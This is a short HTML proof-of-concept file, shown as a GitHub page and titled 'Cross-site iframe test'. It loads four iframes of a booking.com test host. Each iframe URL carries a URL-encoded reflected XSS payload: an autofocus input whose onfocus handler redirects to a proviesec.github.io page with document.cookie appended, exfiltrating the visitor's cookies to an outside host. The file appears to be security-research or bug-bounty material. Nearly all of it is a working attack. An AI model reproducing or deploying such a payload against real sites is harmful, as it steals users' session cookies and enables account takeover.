-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathiframe.html
27 lines (25 loc) · 1.54 KB
/
iframe.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
<html>
<head>
<script>
function navFrame(url) {
document.getElementById("frame1").src = url;
}
</script>
</head>
<body>
<h1>Cross-site iframe test</h1>
Frame 1:<br>
<iframe
id="frame1" allow="interest-cohort 'none';" src="http://test-ams4.booking.com/en/city/gb/glasgow/B_example_1_ro?type=xzatt%3Cinput%20type%3dtext%20autofocus%20onfocus%3d%22window.location%3D%27https%3A%2F%2Fproviesec.github.io%2Fxsstest%2F%2F%3Fcookie%3D%27%2Bdocument.cookie%22%2f%2figko1&msge8=1"
width=500 height=300></iframe><br>
<iframe
id="frame2" allow="interest-cohort 'none';" src="https://test-ams4.booking.com/en/city/gb/glasgow/B_example_1_ro?type=xzatt%3Cinput%20type%3dtext%20autofocus%20onfocus%3d%22window.location%3D%27https%3A%2F%2Fproviesec.github.io%2Fxsstest%2F%2F%3Fcookie%3D%27%2Bdocument.cookie%22%2f%2figko1&msge8=1"
width=500 height=300></iframe>
<iframe
id="frame1" allow="interest-cohort '*';" src="http://test-ams4.booking.com/en/city/gb/glasgow/B_example_1_ro?type=xzatt%3Cinput%20type%3dtext%20autofocus%20onfocus%3d%22window.location%3D%27https%3A%2F%2Fproviesec.github.io%2Fxsstest%2F%2F%3Fcookie%3D%27%2Bdocument.cookie%22%2f%2figko1&msge8=1"
width=500 height=300></iframe><br>
<iframe
id="frame2" allow="interest-cohort '*';" src="https://test-ams4.booking.com/en/city/gb/glasgow/B_example_1_ro?type=xzatt%3Cinput%20type%3dtext%20autofocus%20onfocus%3d%22window.location%3D%27https%3A%2F%2Fproviesec.github.io%2Fxsstest%2F%2F%3Fcookie%3D%27%2Bdocument.cookie%22%2f%2figko1&msge8=1"
width=500 height=300></iframe>
<p>
</html>